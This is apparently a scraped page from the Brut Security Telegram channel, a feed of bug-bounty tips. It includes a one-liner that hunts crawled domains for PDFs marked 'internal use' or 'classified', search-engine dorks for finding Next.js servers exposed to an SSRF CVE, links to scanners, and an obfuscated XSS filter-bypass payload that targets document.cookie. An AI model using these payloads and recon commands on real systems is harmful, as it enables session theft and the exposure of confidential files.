Brut Security – Telegram
Brut Security
14.7K subscribers
911 photos
73 videos
287 files
969 links
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: info@brutsec.com
Download Telegram
♨️One-liner to find sensitive PDF file♨️
for i in `cat apex-domains.txt | gau --subs --threads 16 | grep -Ea '\.pdf' | httpx -silent -mc 200`; do if curl -s "$i" | pdftotext -q - - | grep -Eaiq 'internal use|classified'; then echo $i; fi; done
21👍1
Brut Security pinned Deleted message
🚨Gourlex🚨

📢It is a simple tool that can be used to extract URLs and paths from web pages. It can be helpful during web application assessments to uncover additional targets.

🔗Link https://github.com/trap-bytes/gourlex
4👍4🗿1
Brut Security pinned Deleted message
🚨CVE-2024-34351:Next.js SSRF in Server Actions🚨

📢 Security researchers at Assetnote have identified a SSRF vulnerability in Next.js Server Actions. If the Host header is modified, and certain conditions are met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself.

📝Dorks--->
Hunter:/product.name="Next.js"
FOFA:app="Next.js"
SHODAN:http.component:"Next.js"

🔗PoC: https://lnkd.in/gKbjiHVY

Stay vigilant and take necessary precautions to protect your applications.
2🎄1
2FA Bypass.pdf
301.4 KB
👍1
demo.gif
10.9 MB
🚨SQLMC - SQL Injection Massive Checker🚨

📢SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.

🔗Download https://github.com/malvads/sqlmc
👍8
SSRF.pdf
212.7 KB
👍4
Brut Security pinned «Keep checking my old Posts to continue your learning Process!»
Brut Security pinned Deleted message
Bypass XSS Filter with Array

Payload :
<nonoscript><p noscript="</nonoscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">
👍6
A ____ is used to connect to a remote system using NetBIOS.
Final Results
46%
NULL session
13%
Hash
10%
Rainbow table
41%
Rootkit
👍1